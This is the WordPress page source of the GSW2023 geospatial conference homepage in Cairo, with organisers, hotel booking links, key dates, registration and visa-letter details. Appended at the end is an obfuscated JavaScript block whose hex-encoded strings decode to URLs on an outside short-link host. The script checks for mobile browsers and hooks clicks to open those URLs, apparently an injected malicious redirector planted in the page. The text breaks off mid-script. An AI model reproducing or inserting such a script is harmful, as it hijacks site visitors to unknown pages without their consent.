!important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320718900{margin-top: 35px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 